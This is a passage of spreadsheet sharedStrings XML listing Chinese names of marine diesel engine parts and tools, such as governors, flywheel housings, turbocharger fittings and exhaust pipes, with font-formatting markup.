        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>臂支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停车臂挡块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压泵伺服马达布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压泵伺服马达总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压泵伺服马达支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷雾插销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆柱齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶盖装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>速度控制</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷雾螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <t>LAMBDA</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸的空气管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停车电磁阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接销</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>抑制二极管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>编程器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>EGB-1.OP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器</t>
    </r>
  </si>
  <si>
    <r>
      <t>PGA12</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>ME-ECS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>参数设定</t>
    </r>
  </si>
  <si>
    <r>
      <t>ME-ECS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>图像操作系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆弹簧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变速箱轴</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停车装置布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰轴承壳体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢琴线</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>计数器板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阻塞螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>偏心的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电位计锁</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>稳压二极管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内弹簧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减压阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1/4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>寸</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气滑阀壳体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气滑阀盒</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功器传动支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导轨滑轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带轴承壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条涨紧器链轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉紧螺栓壳体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧圆盘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉紧螺栓头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭力弹簧</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柔性接头销规</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条涨紧器保持工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩补偿器轮提升工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>量表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>取样工具箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空气旁通</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>花纹钢板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出口管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气集管壳体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>噪音吸收盒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减振器壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶插座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过渡管详图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空气集管孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器箱板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管接头入口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接件接口的再加工</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低负荷鼓风机系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>释放阀安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>释放阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>格栅夹具支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接挡栅支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气集管节流管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气集管外壳</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加固环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器布置</t>
    </r>
  </si>
  <si>
    <r>
      <t>7</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＋</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>8</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＋</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>9</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＃气缸排气管</t>
    </r>
  </si>
  <si>
    <r>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＃缸排气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺钉</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺母装配</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘板支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器规格</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>干洗铭牌</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水洗铭牌</t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>＃气缸排气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃烧系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助空气管安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>火星消灭装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气滤网</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器底座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管防护罩</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>隔振</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连接板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
